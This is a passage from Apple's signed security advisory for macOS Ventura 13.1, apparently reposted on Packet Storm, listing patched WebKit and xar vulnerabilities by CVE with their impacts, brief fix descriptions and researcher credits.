Description: A use after free issue was addressed with improved  
memory management.  
WebKit Bugzilla: 245521  
CVE-2022-42867: Maddie Stone of Google Project Zero

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory consumption issue was addressed with improved  
memory handling.  
WebKit Bugzilla: 245466  
CVE-2022-46691: an anonymous researcher

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may bypass Same  
Origin Policy  
Description: A logic issue was addressed with improved state  
management.  
WebKit Bugzilla: 246783  
CVE-2022-46692: KirtiKumar Anandrao Ramchandani

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may result in the  
disclosure of process memory  
Description: The issue was addressed with improved memory handling.  
CVE-2022-42852: hazbinhotel working with Trend Micro Zero Day  
Initiative

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
input validation.  
WebKit Bugzilla: 246942  
CVE-2022-46696: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 247562  
CVE-2022-46700: Samuel Groß of Google V8 Security

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may disclose  
sensitive user information  
Description: A logic issue was addressed with improved checks.  
CVE-2022-46698: Dohyun Lee (@l33d0hyun) of SSD Secure Disclosure Labs  
& DNSLab, Korea Univ.

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution  
Description: A memory corruption issue was addressed with improved  
state management.  
WebKit Bugzilla: 247420  
CVE-2022-46699: Samuel Groß of Google V8 Security  
WebKit Bugzilla: 244622  
CVE-2022-42863: an anonymous researcher

WebKit  
Available for: macOS Ventura  
Impact: Processing maliciously crafted web content may lead to  
arbitrary code execution. Apple is aware of a report that this issue  
may have been actively exploited against versions of iOS released  
before iOS 15.1.  
Description: A type confusion issue was addressed with improved state  
handling.  
WebKit Bugzilla: 248266  
CVE-2022-42856: Clément Lecigne of Google's Threat Analysis Group

xar  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted package may lead to  
arbitrary code execution  
Description: A type confusion issue was addressed with improved  
checks.  
CVE-2022-42841: Thijs Alkemade (@xnyhps) of Computest Sector 7

Additional recognition

Kernel  
We would like to acknowledge Zweig of Kunlun Lab for their  
assistance.

Lock Screen  
We would like to acknowledge Kevin Mann for their assistance.

Safari Extensions  
We would like to acknowledge Oliver Dunk and Christian R. of  
1Password for their assistance.

WebKit  
We would like to acknowledge an anonymous researcher and scarlet for  
their assistance.

macOS Ventura 13.1 may be obtained from the Mac App Store or Apple's  
Software Downloads web site: https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEBP+4DupqR5Sgt1DB4RjMIDkeNxkFAmOZFYAACgkQ4RjMIDke  
Nxk1zRAAuqDsK19ODzl+oIO6xYMDcbiQV/ibvU9uwLtwTR8Y2wLga9V/vaaPTS6z  
qRkTivKEfdLMVW8Xlzl1jb+BMS0+dIjYrPAFatU8A5H2A3MLY5Trl9tTs+D8BgQJ  
reLRAyR6qJVwu+VMMjgrUxkQliPNYeumrmLwmKJdByYPzv4GLY5bOIf6siUAIJdB  
vs2zzcq6+BnoJkS1iYa+Ub5S3bSryR2i8vrSit6PcYBtLKHxUJaK2YBdA8LoqB4J  
wenkEaEhyilm0bpyyF0VxDuvOcotqrGa2ikScrik/N/NueMqDi9duo9kKKVia0xa  
Gx2cYLNDG10KBmz9w9B8YC6lNa6t7M5zmCYn8TmXTfndd7fCYbYajZNT0WxIYteK  
sXYPkVpqEd4KVZxtQ3MfHlx5y4FwnqBkLACnfsNCs4KatbJPEg9Qy9Mn2ymi/9He  
UoVt3XnQVhAgGIRV2qezjV9r0rtgnWpSKvFd9LSDcB9F6b/bzRipbxVnqdWCL1If  
ymeeEY8BJ7WJnFqgXzRo42+4bp4R67iNH+Z/JjUy/Z7C3f2O66fFZu2pNL1vLILA  
Wi/dprF13SjqCIavwWPbVL8UvfaAwBz53y38gwei6eSdsEO383r0XIIKjErGbWm6  
hqHq/QKTWHQZqUFj4kUb4Ajw8Qe0j0qSrCLt4Wl11u/0r5hTRyI=  
=C5EK  
-----END PGP SIGNATURE-----

Source

Packet Storm